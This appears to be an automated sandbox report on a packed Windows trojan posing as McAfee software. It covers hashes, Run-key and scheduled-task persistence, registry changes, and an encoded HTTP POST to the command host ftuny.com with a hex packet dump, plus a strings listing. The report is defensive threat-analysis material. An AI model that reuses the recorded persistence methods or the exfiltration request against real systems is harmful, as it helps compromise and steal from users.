Analysis Date: 2014-08-27 00:00:36
MD5: 0b5d9a9f1ee75b1de5982ae77f479131
SHA1: eaad8bad8c7dadf5fc4a8c15569b7d6f3dc174c4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a5194be073c874f0137f106ea073d2bd sha1: c87c2e81e1bfbbb7c8eb14c42f78023c6aa5590d size: 52736
Section .data md5: 81fc7746d2385b19fdf278f28b1c8004 sha1: d040cc6455bbeb07e85217bae55079f1fde85d8f size: 1024
Section .DATA0 md5: c99a74c555371a433d121f551d6c6398 sha1: 605db3fdbaff4ba13729371ad0c4fbab3889378e size: 2048
Section .DATA7 md5: d448d5524e86c72703646c1beb3910a2 sha1: 80b0b0e6fa3f6e8cc95a7976b100ed46959a8143 size: 125952
Section .DATA3 md5: 571bfec41fc4a428b85a9e484839bd14 sha1: 2f681f46fc929f909433e823f90d248569e3a36b size: 15360
Section .DATA2 md5: 805bcef44f1d364718d87ba3559c2030 sha1: 1226aa806ae8d95f7d1402960b542cc1137d7e98 size: 3584
Section .rsrc md5: 16470a139587ebc9e4aa8838e4578aec sha1: 7c7430115e1d085b5bb49b6a4c9d84df9632d0c4 size: 1536
Timestamp: 2009-02-03 18:12:52 (PE header compile timestamp as declared by the file; this field is writable by the author and is not reliable evidence of build date)
Version info:
LegalCopyright: Copyright © McAfee Inc. Unlimited Edition
InternalName: UnlimitedEdition.exe
FileVersion: 6.0.6001.17727
CompanyName: Windows (R) Codename Longhorn DDK provider
ProductName: Unlimited Edition Version Ex-2011 by McAfee Inc.
ProductVersion: 6.0.6001.17727
FileDescription: Windows Setup API
OriginalFilename: UnlimitedEdition.exe
Note: version-resource strings are self-declared by the binary and are not evidence of provenance. Here the copyright, company name and file description attribute the file to three unrelated sources (McAfee, a Windows DDK provider, Windows Setup API), which is itself a useful static indicator.
Packer: FSG v1.10 (Eng) -> dulek/xt
PEhash: 544fa33d4ec2dae21a7dc65f5de3cb8f894fe494
IMPhash: 15cfb2a1a83d68b79bc4c44cbdf0cc10
Note: because the sample is FSG-packed, the import table and the Strings section below reflect the packer stub and compressed payload, not the unpacked code; the API names listed are only those visible in the packed image.

Runtime Details:


Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\JP595IR86O ➝
C:\malware.exe
(Run-key autostart persistence. The value name JP595IR86O is reused as the name of the per-sample key under HKCU\Software below.)
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
(Entries resolving to NULL are most likely queries of the proxy and zone settings rather than writes — this log does not distinguish the two. The zone sub-key name appears garbled in extraction.)
Registry: HKEY_CURRENT_USER\Software\JP595IR86O\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
(Base64-looking blob stored under a sample-specific key; it is not decoded in this report. The key path HKCU\Software\JP595IR86O is a host-based indicator for this run.)
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
(A .job file in the Tasks directory is consistent with a scheduled task being registered — a second execution/persistence path alongside the Run key above; the task's command line is not shown in this report.)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
(The index.dat files and the WinInet mutexes below indicate the HTTP traffic is issued through WinInet rather than raw sockets.)
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: ftuny.com

Network Details:

DNS: alibaba.com
Type: A
205.204.96.36
DNS: tumblr.com
Type: A
66.6.41.30
DNS: tumblr.com
Type: A
66.6.42.30
(No HTTP flow to alibaba.com or tumblr.com is recorded below; these lookups may be connectivity checks, but that is not confirmed by this log.)
DNS: ftuny.com
Type: A
208.73.210.219
DNS: ftuny.com
Type: A
208.73.211.174
DNS: ftuny.com
Type: A
208.73.211.233
DNS: ftuny.com
Type: A
208.73.211.235
DNS: ftuny.com
Type: A
208.73.211.246
DNS: phreeway.com
Type: A
(No A record was returned for phreeway.com in this run.)
HTTP POST: http://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.210.219:80
(The POST body is 341 bytes of URL-encoded, base64-looking text in a `data=` parameter — see Raw Pcap, offset 0x00f3 onward; Content-Length matches. The destination is the first A record returned for ftuny.com. The URI path /borders.php together with this User-Agent string is a usable network indicator for this sample; the encoded payload is not decoded in this report.)

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   70553375 4f487037 65526348 5069596f   pU3uOHp7eRcHPiYo
0x00000150 (00336)   39394d4d 55756a67 55573462 76544964   99MMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c6f 73583149   /Golwxlm9kLosX1I
0x00000230 (00560)   365a5136 6e333664 2f6e346b 72315677   6ZQ6n36d/n4kr1Vw
0x00000240 (00576)   6271516a 2f413d3d                     bqQj/A==


Strings
H..8q.
b
.\.
.qR.
].
D.
f.
.....5u...5fu..V..|..
040904B0
0d7T
1DAe
6.0.6001.17727
84lN
8nzS
B8Q7
BrO5
CompanyName
Copyright 
D1kU
DgQc8
DTQRi
eB1yy
eMdT
fBPS
FileDescription
FileVersion
I3X9
InternalName
Kxqm
Lall
LegalCopyright
 McAfee Inc. Unlimited Edition
MxPA
OriginalFilename
P8L0
pRnz
ProductName
ProductVersion
PsF1
StringFileInfo
tOw5
Translation
tUiW
UnlimitedEdition.exe
Unlimited Edition Version Ex-2011 by McAfee Inc.
VarFileInfo
VS_VERSION_INFO
Windows (R) Codename Longhorn DDK provider
Windows Setup API
0e4QXi
0GqPtf
0OKOPlM
0)SkHe
0Umgi6
#0YuB$
16ZLPe
1qdeWu:?
2EK2&4
2fmIKNz
2!j{e<
2mnqFq
+2v{RBY
_.37{g
~37os:
3cBv78
3cUKGx
3diXHe
3maj,x
3P_XMUt
3qDPPu4G
40l7vfJ[*g2C
4<^gwSV
4`?	*H
4//]j!
@4q~\1
4SE1[f
53]Q=C
5g6Ylxx
5rf(2//4
5tGH]EQ
5uWK0Y
5xfw]v$
5Y%dPE
60g+g>}(
6HTHrE226Y
(6}_yb
\73`,_
7%7'!23!
78=r5k
7dDyKIA
7eTp2eG
7FE)EU
7hxkTrY
}7kMc_
7	L's2
7q?]A><u
8QiPOy9ZmY
8yOt06vIjd1D
8Z5we1
9}rB+5E
9vvtsC
_a1_euy
	absL)TS
_acmdln
ActivateKeyboardLayout
ADVAPI32.dll
Adz*IA
aGQywq%oM7
A$nS`s
AoiwwMw
aSJJ6Yq
AT_^\IV
~b4eXR
!BaG[zq
BDBmI8
beCxTWNbd
bEIa0V
BiNYvS
B_sfSUP
BUBLJ9
_:bxw'
bxW$7i
c]\/B.
cDQXMH
ChooseColorA
;|[CHq
C"IqwXF>
CLSIDFromString
CoDisconnectObject
CoGetContextToken
comctl32.dll
comdlg32.dll
COMDLG32.dll
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemFree
CoUninitialize
CoUnmarshalInterface
CQfG0yu
_CqOZt
CreateBindCtx
CreateFontIndirectA
CreatePalette
CreateStreamOnHGlobal
cscHKC
`c~U-CV
cyQOlkGV
D27}km
)D%6^qy
`.data
.DATA0
.DATA2
@.DATA3
.DATA7
DE[3IN[pG
dmvHetqbgC
dOMgQW3$
<!Dv~87
\Dv#.k
.E9v*OR
E!ATG1
&)>Eb 
eCtR][
#eDFO\
edxYMn
Egchkwx
e=K23*
e kW!	0q
;eLkA##
eM0lUd7B
E m^5^
e_MniK5
 eN7taG4
eNGXgX
e[o:98
EP<Cq!
e&[=vf
ExitProcess
ExitThread
EyLkS5
f]0>uN
FBKa349
FGc'E[P0
FG}e;Aw
FindTextA
F}_?jJI
Fmc%Y_aEwU
fnG|~dj9v7
#fq|}Ex
ft3BbVW
Ft__$q
FT&zD_
fxE2B9
'*$g_/
g1Sv1Wh
G5Q=@	
g_5u@Y)g
>*g6jd
G6|"JZ
GbhHVF
gdi32.dll
GDI32.dll
GetActiveWindow
GetBitmapBits
GetCommandLineW
GetDIBColorTable
GetFileAttributesA
GetFileTitleA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetModuleHandleA
GetOpenFileNameA
GetPaletteEntries
GetProcAddress
GetSaveFileNameA
GetVersionExA
ggIoqB
GiUZsu
GlobalAlloc
GlpgY0H
Gn\qBD
g)OS+Y
gUh_fEQ
,%!@h]
H3O'Sx
@h$6 S
heCmXyj
he'xBx
=hN0_9\
hRBO6>
hugmGVq
hU!:QD
?hUyOU
HWHw4k
H|,w;&R
{	@}i"
I3sg&V
iEwr5dG
igF`AT
iL41uL8
ImageList_Create
ImageList_Destroy
ImageList_Draw
ImageList_DrawEx
i)PAO5
IqfMfWse2
iRI8p7erE
IsBadHugeReadPtr
IsBadReadPtr
IVerFindFileA
IxC2vB
IxCfSR
Iy#"\(
j1jAjYjGR
j4j}j[P
j7jBjo
j!a wdv>0
jbjlj1
jBjpj/
J^cF2)rE
jcjCj~
jCj<j-
jdjIjp
jdjvjlj
JFi9A+oV
jij7jYjp
j{j1j[W
j$jIjK
j@j)j_j
jjy7vOpbp
jKjejT
jkjrjD
.JOh,\
jOj,jl
JprF{;gG
jqj=jb
jQjzjJ
jSjojUW
jTj9j4
jUj?jJ
jxj.jv
J	Ye^Fu
j`'}ygOk
jYj2j$V
jYjYjp
JZQ\*w 
k0L^~[
K3Mx3l
k7XJD6
kCyM&Y2AT7
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
kGGHg0
KJsROW
KP59Iu0
KPG%kA9
kqR;G\
KrnBFw
Ksqwpi
 k#s/*y
KuS/"h\
kx5yU4t
 KXYHw
L>3K5e&O
l7uVGB5w
lbPLuq
ldnpetDj
LFo@A.
^%LG<|
Lg/&u^
lHVwyJud
LoadLibraryExA
:lP\X?
Lv[we_
M61;F.X<
m7K ym
MCBbq6
|MDNSP
memcpy
MkParseDisplayName
~mOR{&
m_qZ"w
mSTo0bm
msvcrt.dll
MSVCRT.dll
M)U5{CAIz
~ $N{2
;N_6E[s
N^\7Sk
n/Eg29
NeUw&(
?Nl~q}tR1
N;q7fr
{NQXa(
n[ybg<_%
n'yn3/
(O*(*\
o3VuuNw
O51EYIEb
OArR8wi
_}|O@B
O&D<?P
oD('WX
}O)< E
}OEq"%
OfMJ4YT
OIDu6:
ole32.dll
OLE32.dll
OLEAUT32.dll
OleCreateStaticFromData
OleRegGetUserType
OleRun
`oMMu#
OUvLHX
)}#'^p
P84HNx
PathFileExistsA
PathGetCharTypeA
PathIsContentTypeA
PathIsDirectoryA
Pg-t("5
PJEzyV
Pj!j>Q
Pk1Ww6
pKLSW9
pOONtO
PpMDenODe6m
PropVariantClear
pSNbQ8
p~WRZ{
Q3$HQ>',
qAwH6[
QbVsKf
q;C\S{
QEw\S[
Qj:jyQ
Qjrj,P
`!q>/s
qs[uQg
QU3t^_
Qx\m7wE
{r1N O
r2]VHq
)r57/Jv
R6SIx(
ra2N5xFn
RegisterTypeLib
RegLoadKeyA
RegOpenKeyExA
ReleaseStgMedium
REX:0gS
RgCsJo
RjYj|V
r=}m;(%0
}R#OO\GU
rowWCAp[
rpcrt4.dll
r{R(e^ $<
@.rsrc
rsv5[kux
.~r)Yq
RzSQtf
/rZxHZ
@s:4]7vg
S[5gN3EcL"
SafeArrayGetElement
SafeArrayGetUBound
sbaDQqLB
sc aX&[
SetTextColor
SHELL32.dll
SHGetFolderPathA
shlwapi.dll
SHQueryInfoKeyA
SHQueryValueExA
SHSetValueA
sJ9KJx
s])&}m
^SMdvV
SNfbOdbntHj
sprintf
SR^kA=-
SrYl5ND1U
StringFromIID
SUTNKt
s;uXC{U["
's&#]Vuw
s.wkM5a
t0mEn3
T_4Q:|
~{t6[u}Z_
tB%wOd
#t(/CtNu&
t:Eqcf
TEVQYN
TgDoLv
!This program cannot be run in DOS mode.
;TJfYH
tJILff
tLN1UZ
`{T-lu
Ty+0Sy
U3tuyEF
U9Up83A
	UGMD+
uGyjAC
u:m%tl[
UnhookWindowsHookEx
unSUA 
user32.dll
uS_LR_
_Us""Y
u[wwnr
ux{=33
>UXcu^
UXew15
}v[&[}
v8|$_1
vc]QLZI
vE{lgG5
VerFindFileA
VERSION.dll
VERSION.DLL
V@gqS'Q
VirtualAlloc
Vj8j3W
Vj8jYV
Vj:j{Q
v"_?K&
VKmN_6CX3
v<;ms\L
VO}JGa.
VQ#hDH
vtmoV5a
vu$Ff_
VUhsN_
vuSV 1N
vv5_Z|
VVGaV0v
Vww5Ba
VZjQj4XP
w48JGK
`w`8sz
Wb*S+Y
wcscspn
w(!dvg
w}GKn_X
wIETGrT
Wj	jBV
Wjoj_V
Wjtj	P
WnQE'G
wpRFjg
wr(~'Y
ws7mE95
:"W#t>"
\[	X, 
X03HWS
xBe",)p>
X{BrE-
&{,xG Z
X'qa-2r
xUiyyO
x%>=xb{
xxVq0PA
Y\%0Kb
,Y8u S'
=yF$KD}
yg/oJYVLg
yHj/:D
+yHkwA
YKGhEH
|YL[gX_P
{YLXXb
YrjVKTJ
 -Y]Sd
ysHr\<
yUD,EsCku5F|K
YwFiPt
yxYbmO
z00x2nDIw
z/#a~gH'
zFb'#.q
Zp[D\D
)Zs:/p
zuODPH
Z*V}`G
ZXETSU
\Z(.xT